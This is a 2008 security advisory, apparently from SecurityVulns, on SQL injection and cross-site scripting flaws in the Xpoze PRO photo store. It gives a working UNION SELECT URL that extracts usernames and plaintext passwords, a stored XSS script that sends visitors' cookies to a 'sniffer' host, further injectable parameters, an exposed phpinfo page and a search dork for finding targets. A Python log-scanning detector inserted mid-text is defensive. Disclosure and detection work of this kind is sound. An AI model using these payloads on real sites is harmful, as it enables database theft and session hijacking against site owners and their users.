securityvulns: SECURITYVULNS:DOC:20121

Jul 04, 2008 - 12:00 a.m.

Xpoz SQL-INJECTION, XSS.


Application: Xpoz PRO (Expoze Photo Store)

Website: http://xpoze.org

Version: All (current 1.0)

About:

Xpoze is a photo store very easy to use, yet having lots of features to help buyers and sellers to find or sell images after their needs.

Googledork: Powered by Powered by Xpoze.org

Date: 01-07-2008

Description:

Multiple SQL injection vulnerabilities, plus active and passive XSS.

[ SQL-INJECTION ]

http://host/home.html?menu=1[SQL]
http://host/user.html?uid=1[SQL]
http://host/account/admin/edite.html?eid=1[SQL]

and other…

===>>> Exploit:

http://host/user.html?uid=-1%20union%20select%201,user,1,1,1,pass,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20users%20limit%203,1/*

(!) The password is stored in the database in plaintext (!)
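A detection sketch for the requests described above, added here as an example and not part of the original advisory: it scans web access logs for the three listed ID parameters (menu, uid, eid) carrying anything other than a plain integer after percent-decoding. The Common Log Format layout, the sample log lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory lists as injectable; each is expected to be a plain integer ID.
NUMERIC_PARAMS = {
    "/home.html": {"menu"},
    "/user.html": {"uid"},
    "/account/admin/edite.html": {"eid"},
}

# Assumed log layout: Common Log Format request field, e.g. "GET /path?query HTTP/1.1".
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"[0-9]{1,10}")


def suspicious_params(request_target):
    """Return (param, decoded_value) pairs whose value is not a plain non-negative integer."""
    parts = urlsplit(request_target)
    watched = NUMERIC_PARAMS.get(parts.path, set())
    hits = []
    # parse_qsl percent-decodes values, so %20union%20select is checked in decoded form.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in watched and not INTEGER_RE.fullmatch(value):
            hits.append((name, value))
    return hits


def scan(log_lines):
    """Return (line_number, param, value) for every flagged request in the log."""
    findings = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line in the assumed format
        for name, value in suspicious_params(match.group(1)):
            findings.append((number, name, value))
    return findings


# Constructed sample log lines (not from a real server).
SAMPLE_LOG = [
    '198.51.100.7 - - [04/Jul/2008:10:00:01 +0000] "GET /user.html?uid=42 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [04/Jul/2008:10:00:05 +0000] "GET /user.html?uid=-1%20union%20select%201,user%20from%20users/* HTTP/1.1" 200 4800',
    '198.51.100.9 - - [04/Jul/2008:10:00:09 +0000] "GET /home.html?menu=1%27 HTTP/1.1" 500 310',
    '198.51.100.7 - - [04/Jul/2008:10:00:12 +0000] "GET /home.html?menu=3&title=on HTTP/1.1" 200 7000',
]

if __name__ == "__main__":
    for number, name, value in scan(SAMPLE_LOG):
        print(f"line {number}: {name}={value!r}")
```

The same integer-only rule is what the application should enforce on these parameters before they reach a query, in addition to using bound parameters.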

[ ACTIVE XSS ]

The forum does not filter the topic and message fields.

===>>> Exploit:

<script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script>

[ PASSIVE XSS :) ]

http://host/?tpl=[XSS]
http://host/home.html?title=on&description=on&photo=on&keywords=[XSS]

and

PHPInfo - http://host/phpinfo.php

…by Corwin…